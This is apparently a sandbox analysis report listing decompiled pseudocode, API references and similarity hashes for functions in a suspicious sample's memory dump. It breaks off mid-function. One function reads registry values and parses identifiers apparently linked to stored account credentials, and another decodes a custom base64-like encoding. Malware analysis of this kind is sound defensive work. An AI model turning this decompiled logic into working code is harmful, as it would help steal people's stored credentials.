                                                                                                                                                                        • Instruction Fuzzy Hash: D90128B1650B002BD235AB35CD03F6B77A4EB54B14F000B1EF642E66D3D7A8A14489AD
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040242B Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040242B(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
				void _v2058;
				char _v2060;
				char _v2069;
				char _v2070;
				char _v2071;
				char _v2072;
				char _v3086;
				signed char _v3090;
				char _v3091;
				char _v3092;
				char* _v3096;
				char _v3100;
				short* _v3104;
				int _v3108;
				char _v3112;
				void* __ebx;
				void* _t49;
				signed int _t61;
				short* _t76;
				void* _t83;
				signed int _t87;
				void* _t90;

				_t83 = __eax;
				_t73 = 0;
				 *_a12 = 0;
				_v3112 = 0x400;
				_t49 = E0040F214(__ecx, _a4, _a8,  &_v3092,  &_v3112);
				_t90 = (_t87 & 0xfffffff8) - 0xc28 + 0x10;
				if(_t49 == 0) {
					_v2069 = 0;
					_v2070 = 0;
					_v2071 = 0;
					_v2072 = 0;
					if(_v3092 != 1) {
						if(_v3092 == 2 &&  *((intOrPtr*)(_t83 + 0xa94)) != 0) {
							_v3100 = _v3112 - 1;
							_v3096 =  &_v3091;
							if(E0040481B(_t83 + 0x890,  &_v3100, 0,  &_v3108) != 0) {
								WideCharToMultiByte(0, 0, _v3104, _v3108, _a12, 0x7f, 0, 0);
								LocalFree(_v3104);
							}
						}
					} else {
						if( *((intOrPtr*)(_t83 + 0x888)) != 0) {
							if(_a16 == 0) {
								E0040EFF9(_a12, _t83 + 0x87c,  &_v3090, 0x7f, 0);
							} else {
								_v2060 = 0;
								memset( &_v2058, 0, 0x800);
								_t90 = _t90 + 0xc;
								_t76 =  &_v2060;
								E0040EFF9(_t76, _t83 + 0x87c,  &_v3091, 0x400, 1);
								WideCharToMultiByte(0, 0, _t76, 0xffffffff, _a12, 0x7f, 0, 0);
							}
							_t73 = 0;
						}
						_t79 = _a12;
						if( *_a12 == _t73 && _v3112 >= 7 && _v3092 == 1 && _v3091 == 1) {
							_t61 = _v3090 & 0x000000ff;
							if(_t61 > 1 && _v3112 >= _t61 + 6) {
								E00401DBC(_t79,  &_v3086, _t61);
							}
						}
					}
				}
				return 0 |  *_a12 != _t73;
			}

























                                                                                                                                                                        0x00402439
                                                                                                                                                                        0x0040243e
                                                                                                                                                                        0x00402440
                                                                                                                                                                        0x0040244f
                                                                                                                                                                        0x0040245a
                                                                                                                                                                        0x0040245f
                                                                                                                                                                        0x00402464
                                                                                                                                                                        0x0040246f
                                                                                                                                                                        0x00402476
                                                                                                                                                                        0x0040247d
                                                                                                                                                                        0x00402484
                                                                                                                                                                        0x0040248b
                                                                                                                                                                        0x0040255d
                                                                                                                                                                        0x0040256c
                                                                                                                                                                        0x00402574
                                                                                                                                                                        0x00402590
                                                                                                                                                                        0x004025a3
                                                                                                                                                                        0x004025ad
                                                                                                                                                                        0x004025ad
                                                                                                                                                                        0x00402590
                                                                                                                                                                        0x00402491
                                                                                                                                                                        0x00402497
                                                                                                                                                                        0x0040249c
                                                                                                                                                                        0x00402505
                                                                                                                                                                        0x0040249e
                                                                                                                                                                        0x004024ac
                                                                                                                                                                        0x004024b4
                                                                                                                                                                        0x004024b9
                                                                                                                                                                        0x004024cf
                                                                                                                                                                        0x004024d6
                                                                                                                                                                        0x004024eb
                                                                                                                                                                        0x004024eb
                                                                                                                                                                        0x0040250a
                                                                                                                                                                        0x0040250a
                                                                                                                                                                        0x0040250c
                                                                                                                                                                        0x00402511
                                                                                                                                                                        0x00402534
                                                                                                                                                                        0x0040253c
                                                                                                                                                                        0x0040254e
                                                                                                                                                                        0x00402553
                                                                                                                                                                        0x0040253c
                                                                                                                                                                        0x00402511
                                                                                                                                                                        0x0040248b
                                                                                                                                                                        0x004025c2

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040F214: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040245F,?), ref: 0040F22A
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004024EB
                                                                                                                                                                        • memset.MSVCRT ref: 004024B4
                                                                                                                                                                          • Part of subcall function 0040EFF9: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040F016
                                                                                                                                                                          • Part of subcall function 0040EFF9: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040F037
                                                                                                                                                                          • Part of subcall function 0040EFF9: memcpy.MSVCRT ref: 0040F075
                                                                                                                                                                          • Part of subcall function 0040EFF9: CoTaskMemFree.OLE32(00000000,00000000), ref: 0040F084
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 004025A3
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004025AD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3503910906-0
                                                                                                                                                                        • Opcode ID: 311549387020673e673ad7ade458deddd79687b60b573298398fe302b42a0f0d
                                                                                                                                                                        • Instruction ID: cfc3eb1076764f39a441947bf0103a86c194fcc0ae6958193510771120a15821
                                                                                                                                                                        • Opcode Fuzzy Hash: 311549387020673e673ad7ade458deddd79687b60b573298398fe302b42a0f0d
                                                                                                                                                                        • Instruction Fuzzy Hash: 0341A3B1408385BFDB11DE608D44AAB7BDCAB88304F044A7EF588A21C1D679DA44CB5A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040B4DE Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 98%
                                                                                                                                                                        			E0040B4DE(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void _v263;
				char _v264;
				void* __edi;
				void* __esi;
				signed int _t42;
				signed int _t45;
				intOrPtr* _t60;
				signed char _t62;
				intOrPtr _t63;
				int _t65;

				_t61 = __ecx;
				_t60 = _a8;
				_t63 = __ecx;
				_v8 = __ecx;
				if( *(_t60 + 4) == 0x103 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffff4) {
					_t42 = E00408D0D( *((intOrPtr*)(__ecx + 0x370)), _t60);
					 *((intOrPtr*)(_t63 + 0x10c)) = 1;
					 *(_t63 + 0x110) = _t42;
				}
				if(_a4 == 0x101 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t60 + 0xc)) == 1) {
					_v264 = 0;
					memset( &_v263, 0, 0xff);
					E004019DA(_t61,  &_v264, 0x413438);
					_t42 = E00406552( *((intOrPtr*)(_v8 + 0x108)),  &_v264);
					_t63 = _v8;
				}
				_t65 = 0;
				if( *((intOrPtr*)(_t60 + 8)) == 0xfffffdf8) {
					_t42 = SendMessageA( *(_t63 + 0x118), 0x423, 0, 0);
					if( *_t60 == _t42) {
						_t42 = GetMenuStringA( *(_t63 + 0x11c),  *(_t60 + 4), _t60 + 0x10, 0x4f, 0);
						 *((intOrPtr*)(_t60 + 0x60)) = 0;
					}
				}
				if(_a4 != 0x103) {
					L27:
					return _t42;
				} else {
					_t80 =  *((intOrPtr*)(_t60 + 8)) - 0xfffffffd;
					if( *((intOrPtr*)(_t60 + 8)) == 0xfffffffd) {
						_t42 = E0040AFC4(_t61, _t63, _t63, _t80);
						_t65 = 0;
					}
					if( *((intOrPtr*)(_t60 + 8)) == 0xffffff94) {
						_t42 = E00408C35( *(_t60 + 0x10), _t61,  *((intOrPtr*)(_t63 + 0x370)), _t65);
						_t65 = 0;
					}
					if( *((intOrPtr*)(_t60 + 8)) != 0xffffff9b) {
						goto L27;
					} else {
						if( *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x370)) + 0x1b8)) == _t65) {
							_t62 = 2;
							_t45 =  *(_t60 + 0x14) & _t62;
							__eflags = _t45;
							if(_t45 == 0) {
								L20:
								__eflags = _t45 - _t62;
								if(_t45 == _t62) {
									L23:
									_t42 = 0;
									__eflags = 0;
									L24:
									if(_t42 == _t65) {
										goto L27;
									}
									_t42 = _t63 + 0x25c;
									if( *_t42 != _t65) {
										goto L27;
									}
									 *_t42 = 1;
									return PostMessageA( *(_t63 + 0x108), 0x402, _t65, _t65);
								}
								__eflags =  *(_t60 + 0x18) & _t62;
								if(( *(_t60 + 0x18) & _t62) == 0) {
									goto L23;
								}
								L22:
								_t42 = 1;
								goto L24;
							}
							__eflags =  *(_t60 + 0x18) & _t62;
							if(( *(_t60 + 0x18) & _t62) == 0) {
								goto L22;
							}
							goto L20;
						}
						asm("sbb eax, eax");
						_t42 =  ~( ~(( *(_t60 + 0x18) ^  *(_t60 + 0x14)) & 0x0000f002));
						goto L24;
					}
				}
			}














                                                                                                                                                                        0x0040b4de
                                                                                                                                                                        0x0040b4e8
                                                                                                                                                                        0x0040b4f4
                                                                                                                                                                        0x0040b4f6
                                                                                                                                                                        0x0040b4f9
                                                                                                                                                                        0x0040b509
                                                                                                                                                                        0x0040b50e
                                                                                                                                                                        0x0040b518
                                                                                                                                                                        0x0040b518
                                                                                                                                                                        0x0040b525
                                                                                                                                                                        0x0040b541
                                                                                                                                                                        0x0040b548
                                                                                                                                                                        0x0040b558
                                                                                                                                                                        0x0040b569
                                                                                                                                                                        0x0040b56e
                                                                                                                                                                        0x0040b571
                                                                                                                                                                        0x0040b574
                                                                                                                                                                        0x0040b57d
                                                                                                                                                                        0x0040b58c
                                                                                                                                                                        0x0040b594
                                                                                                                                                                        0x0040b5a6
                                                                                                                                                                        0x0040b5ac
                                                                                                                                                                        0x0040b5ac
                                                                                                                                                                        0x0040b594
                                                                                                                                                                        0x0040b5b6
                                                                                                                                                                        0x0040b653
                                                                                                                                                                        0x0040b653
                                                                                                                                                                        0x0040b5bc
                                                                                                                                                                        0x0040b5bc
                                                                                                                                                                        0x0040b5c0
                                                                                                                                                                        0x0040b5c4
                                                                                                                                                                        0x0040b5c9
                                                                                                                                                                        0x0040b5c9
                                                                                                                                                                        0x0040b5cf
                                                                                                                                                                        0x0040b5db
                                                                                                                                                                        0x0040b5e0
                                                                                                                                                                        0x0040b5e0
                                                                                                                                                                        0x0040b5e6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b5e8
                                                                                                                                                                        0x0040b5f4
                                                                                                                                                                        0x0040b60e
                                                                                                                                                                        0x0040b60f
                                                                                                                                                                        0x0040b60f
                                                                                                                                                                        0x0040b611
                                                                                                                                                                        0x0040b618
                                                                                                                                                                        0x0040b618
                                                                                                                                                                        0x0040b61a
                                                                                                                                                                        0x0040b626
                                                                                                                                                                        0x0040b626
                                                                                                                                                                        0x0040b626
                                                                                                                                                                        0x0040b628
                                                                                                                                                                        0x0040b62a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b62c
                                                                                                                                                                        0x0040b634
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b643
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b649
                                                                                                                                                                        0x0040b61c
                                                                                                                                                                        0x0040b61f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b621
                                                                                                                                                                        0x0040b623
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b623
                                                                                                                                                                        0x0040b613
                                                                                                                                                                        0x0040b616
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b616
                                                                                                                                                                        0x0040b603
                                                                                                                                                                        0x0040b605
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b605
                                                                                                                                                                        0x0040b5e6

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040B548
                                                                                                                                                                        • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040B58C
                                                                                                                                                                        • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040B5A6
                                                                                                                                                                        • PostMessageA.USER32 ref: 0040B649
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3798638045-0
                                                                                                                                                                        • Opcode ID: d3a55612aad303442b70cf6981c395df1170026015e9bbabf54ddfea19c8819b
                                                                                                                                                                        • Instruction ID: f81f675eeec9d049c2f837a36ed854dba7505ce636643832e7163bdc5c509590
                                                                                                                                                                        • Opcode Fuzzy Hash: d3a55612aad303442b70cf6981c395df1170026015e9bbabf54ddfea19c8819b
                                                                                                                                                                        • Instruction Fuzzy Hash: F141E130600611EFCB259F24CC85AA6BBA4FF04325F1486B6E958AB2C5C378DD91CBDD
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040A283 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                        			E0040A283(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				signed int _t63;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t79;
				void* _t84;
				signed int _t86;
				char* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t106;
				void* _t107;

				_t84 = __eax;
				E00408A97(__eax, __eflags);
				_t86 = 0;
				_v12 = 0;
				while(1) {
					_t98 = _a4;
					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
						break;
					}
					_t86 = _t86 + 1;
					if(_t86 < 1) {
						continue;
					}
					if(strlen(_t98) >= 3) {
						break;
					}
					_t79 = atoi(_a4);
					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
					}
					L21:
					if(_a8 != 0) {
						_v12 = _v12 | 0x00001000;
					}
					_t63 = _v12;
					 *0x41848c =  *0x41848c + 1;
					 *((intOrPtr*)(0x418490 +  *0x41848c * 4)) = _t63;
					return _t63;
				}
				_t104 = 0;
				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
				_v16 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
					L14:
					_t100 = 0;
					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
					_v8 = 0;
					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
						L20:
						goto L21;
					}
					_t106 = 0;
					__eflags = 0;
					do {
						_v20 = E00406A01(0, _a4);
						_t67 = E00406A01(0, _a4);
						__eflags = _v20;
						if(_v20 >= 0) {
							L18:
							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
							goto L19;
						}
						__eflags = _t67;
						if(_t67 < 0) {
							goto L19;
						}
						goto L18;
						L19:
						_v8 = _v8 + 1;
						_t100 = _t100 + 0x10;
						_t106 = _t106 + 0x14;
						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
					goto L20;
				}
				_t102 = 0;
				__eflags = 0;
				do {
					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
					_push(_a4);
					_push(_t72);
					L0041207E();
					_push(_a4);
					_v20 = _t72;
					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
					_push(_t74);
					L0041207E();
					_t107 = _t107 + 0x10;
					__eflags = _v20;
					if(_v20 == 0) {
						L11:
						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
						_v16 = 1;
						goto L12;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L12;
					}
					goto L11;
					L12:
					_v8 = _v8 + 1;
					_t102 = _t102 + 0x10;
					_t104 = _t104 + 0x14;
					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
				__eflags = _v16;
				if(_v16 != 0) {
					goto L20;
				}
				goto L14;
			}





















                                                                                                                                                                        0x0040a28a
                                                                                                                                                                        0x0040a28c
                                                                                                                                                                        0x0040a291
                                                                                                                                                                        0x0040a293
                                                                                                                                                                        0x0040a296
                                                                                                                                                                        0x0040a296
                                                                                                                                                                        0x0040a2a0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a2a2
                                                                                                                                                                        0x0040a2a6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a2b2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a2b7
                                                                                                                                                                        0x0040a2bf
                                                                                                                                                                        0x0040a2e0
                                                                                                                                                                        0x0040a2e0
                                                                                                                                                                        0x0040a3c1
                                                                                                                                                                        0x0040a3c6
                                                                                                                                                                        0x0040a3c8
                                                                                                                                                                        0x0040a3c8
                                                                                                                                                                        0x0040a3d5
                                                                                                                                                                        0x0040a3d8
                                                                                                                                                                        0x0040a3de
                                                                                                                                                                        0x0040a3e6
                                                                                                                                                                        0x0040a3e6
                                                                                                                                                                        0x0040a2e9
                                                                                                                                                                        0x0040a2eb
                                                                                                                                                                        0x0040a2f2
                                                                                                                                                                        0x0040a2f5
                                                                                                                                                                        0x0040a2f8
                                                                                                                                                                        0x0040a35c
                                                                                                                                                                        0x0040a35c
                                                                                                                                                                        0x0040a35e
                                                                                                                                                                        0x0040a364
                                                                                                                                                                        0x0040a367
                                                                                                                                                                        0x0040a3bf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a3c0
                                                                                                                                                                        0x0040a369
                                                                                                                                                                        0x0040a369
                                                                                                                                                                        0x0040a36b
                                                                                                                                                                        0x0040a389
                                                                                                                                                                        0x0040a38e
                                                                                                                                                                        0x0040a393
                                                                                                                                                                        0x0040a399
                                                                                                                                                                        0x0040a39f
                                                                                                                                                                        0x0040a3a8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a3a8
                                                                                                                                                                        0x0040a39b
                                                                                                                                                                        0x0040a39d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a3ab
                                                                                                                                                                        0x0040a3ab
                                                                                                                                                                        0x0040a3b1
                                                                                                                                                                        0x0040a3b4
                                                                                                                                                                        0x0040a3b7
                                                                                                                                                                        0x0040a3b7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a36b
                                                                                                                                                                        0x0040a2fa
                                                                                                                                                                        0x0040a2fa
                                                                                                                                                                        0x0040a2fc
                                                                                                                                                                        0x0040a302
                                                                                                                                                                        0x0040a306
                                                                                                                                                                        0x0040a309
                                                                                                                                                                        0x0040a30a
                                                                                                                                                                        0x0040a30f
                                                                                                                                                                        0x0040a312
                                                                                                                                                                        0x0040a318
                                                                                                                                                                        0x0040a31c
                                                                                                                                                                        0x0040a31d
                                                                                                                                                                        0x0040a322
                                                                                                                                                                        0x0040a325
                                                                                                                                                                        0x0040a329
                                                                                                                                                                        0x0040a32f
                                                                                                                                                                        0x0040a338
                                                                                                                                                                        0x0040a33b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a33b
                                                                                                                                                                        0x0040a32b
                                                                                                                                                                        0x0040a32d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040a342
                                                                                                                                                                        0x0040a342
                                                                                                                                                                        0x0040a348
                                                                                                                                                                        0x0040a34b
                                                                                                                                                                        0x0040a34e
                                                                                                                                                                        0x0040a34e
                                                                                                                                                                        0x0040a356
                                                                                                                                                                        0x0040a35a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00408A97: ??2@YAPAXI@Z.MSVCRT ref: 00408AB8
                                                                                                                                                                          • Part of subcall function 00408A97: ??3@YAXPAX@Z.MSVCRT ref: 00408B7F
                                                                                                                                                                        • strlen.MSVCRT ref: 0040A2A9
                                                                                                                                                                        • atoi.MSVCRT ref: 0040A2B7
                                                                                                                                                                        • _mbsicmp.MSVCRT ref: 0040A30A
                                                                                                                                                                        • _mbsicmp.MSVCRT ref: 0040A31D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4107816708-0
                                                                                                                                                                        • Opcode ID: fcbe6108af864edb97e3be4016439bdb3d8805d59c5b364e212079bc31d54683
                                                                                                                                                                        • Instruction ID: a4071902e71568577f89ec7532499d814672e4af5b69a40392892895b6c6556c
                                                                                                                                                                        • Opcode Fuzzy Hash: fcbe6108af864edb97e3be4016439bdb3d8805d59c5b364e212079bc31d54683
                                                                                                                                                                        • Instruction Fuzzy Hash: 2F414C35900304ABCB11DFA9C580A9ABBF4FB48308F1085BEEC45EB382D775DA51CB59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00411533 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00411533(char* __eax, void* __edi) {
				unsigned int _v5;
				signed int _v6;
				signed int _v7;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t37;
				char* _t56;
				signed char _t57;
				char* _t67;
				void* _t68;
				void* _t69;

				_t68 = __edi;
				_t56 = __eax;
				_t69 = 0;
				_t37 = strlen(__eax) + 0xfffffffd;
				_v16 = _t37;
				if(_t37 < 0) {
					L18:
					 *((char*)(_t69 + _t68)) = 0;
					return _t69;
				}
				_v12 = 0xfffffffe;
				_v12 = _v12 - _t56;
				_t5 = _t56 + 2; // 0x4116ad
				_t67 = _t5;
				while(1) {
					_t6 = _t67 - 2; // 0x75fff88b
					_t39 =  *_t6;
					if( *_t6 != 0x2e) {
						_v6 = E004114FF(_t39);
					} else {
						_v6 = 0x3e;
					}
					_t9 = _t67 - 1; // 0xfc75fff8
					_t41 =  *_t9;
					if( *_t9 != 0x2e) {
						_v5 = E004114FF(_t41);
					} else {
						_v5 = 0x3e;
					}
					_t43 =  *_t67;
					if( *_t67 != 0x2e) {
						_t57 = E004114FF(_t43);
					} else {
						_t57 = 0x3e;
					}
					_t45 =  *((intOrPtr*)(_t67 + 1));
					if( *((intOrPtr*)(_t67 + 1)) != 0x2e) {
						_v7 = E004114FF(_t45);
					} else {
						_v7 = 0x3e;
					}
					 *(_t68 + _t69) = _v5 >> 0x00000004 | _v6 << 0x00000002;
					if( *_t67 == 0x2d) {
						break;
					}
					 *(_t69 + _t68 + 1) = _t57 >> 0x00000002 | _v5 << 0x00000004;
					if( *((char*)(_t67 + 1)) == 0x2d) {
						 *((char*)(_t69 + _t68 + 2)) = 0;
						_t34 = _t69 + 2; // 0x2
						return _t34;
					}
					_t69 = _t69 + 3;
					 *(_t69 + _t68 - 1) = _t57 << 0x00000006 | _v7;
					_t25 = _t69 + 5; // 0x2
					_t67 = _t67 + 4;
					if(_t25 >= 0x3ff || _v12 + _t67 > _v16) {
						goto L18;
					} else {
						continue;
					}
				}
				 *(_t69 + _t68 + 1) = 0;
				_t31 = _t69 + 1; // 0x1
				return _t31;
			}














                                                                                                                                                                        0x00411533
                                                                                                                                                                        0x0041153b
                                                                                                                                                                        0x0041153e
                                                                                                                                                                        0x00411545
                                                                                                                                                                        0x00411549
                                                                                                                                                                        0x0041154c
                                                                                                                                                                        0x00411604
                                                                                                                                                                        0x00411604
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00411608
                                                                                                                                                                        0x00411552
                                                                                                                                                                        0x00411559
                                                                                                                                                                        0x0041155c
                                                                                                                                                                        0x0041155c
                                                                                                                                                                        0x0041155f
                                                                                                                                                                        0x0041155f
                                                                                                                                                                        0x0041155f
                                                                                                                                                                        0x00411564
                                                                                                                                                                        0x00411571
                                                                                                                                                                        0x00411566
                                                                                                                                                                        0x00411566
                                                                                                                                                                        0x00411566
                                                                                                                                                                        0x00411574
                                                                                                                                                                        0x00411574
                                                                                                                                                                        0x00411579
                                                                                                                                                                        0x00411586
                                                                                                                                                                        0x0041157b
                                                                                                                                                                        0x0041157b
                                                                                                                                                                        0x0041157b
                                                                                                                                                                        0x00411589
                                                                                                                                                                        0x0041158d
                                                                                                                                                                        0x00411598
                                                                                                                                                                        0x0041158f
                                                                                                                                                                        0x0041158f
                                                                                                                                                                        0x0041158f
                                                                                                                                                                        0x0041159a
                                                                                                                                                                        0x0041159f
                                                                                                                                                                        0x004115ac
                                                                                                                                                                        0x004115a1
                                                                                                                                                                        0x004115a1
                                                                                                                                                                        0x004115a1
                                                                                                                                                                        0x004115bd
                                                                                                                                                                        0x004115c3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004115d2
                                                                                                                                                                        0x004115da
                                                                                                                                                                        0x00411618
                                                                                                                                                                        0x0041161d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0041161d
                                                                                                                                                                        0x004115e2
                                                                                                                                                                        0x004115e5
                                                                                                                                                                        0x004115e9
                                                                                                                                                                        0x004115ec
                                                                                                                                                                        0x004115f4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004115f4
                                                                                                                                                                        0x0041160e
                                                                                                                                                                        0x00411613
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strlen
                                                                                                                                                                        • String ID: >$>$>
                                                                                                                                                                        • API String ID: 39653677-3911187716
                                                                                                                                                                        • Opcode ID: 7edb754ddf4429fd3ce2b30709e1edacb08f523e3e7d14c7b467b5b93d7c181c
                                                                                                                                                                        • Instruction ID: 10e230c6dca09e0a93cf8d60ed085072b0d540c64d6ff1ff1f1df815401d523a
                                                                                                                                                                        • Opcode Fuzzy Hash: 7edb754ddf4429fd3ce2b30709e1edacb08f523e3e7d14c7b467b5b93d7c181c
                                                                                                                                                                        • Instruction Fuzzy Hash: 6331E4718492C5AFCB118B6C80417EEFFA24F62304F08869AC2D546353C26DA5CAC39A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040BE4E Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                        			E0040BE4E(signed int __eax, void* __ecx, void* _a4) {
				unsigned int _t23;
				signed int _t25;
				unsigned int _t34;
				unsigned int _t36;
				void* _t40;
				unsigned int _t45;
				void* _t46;
				int _t47;
				void* _t48;
				void* _t50;

				_t48 = __ecx;
				_t34 = __eax;
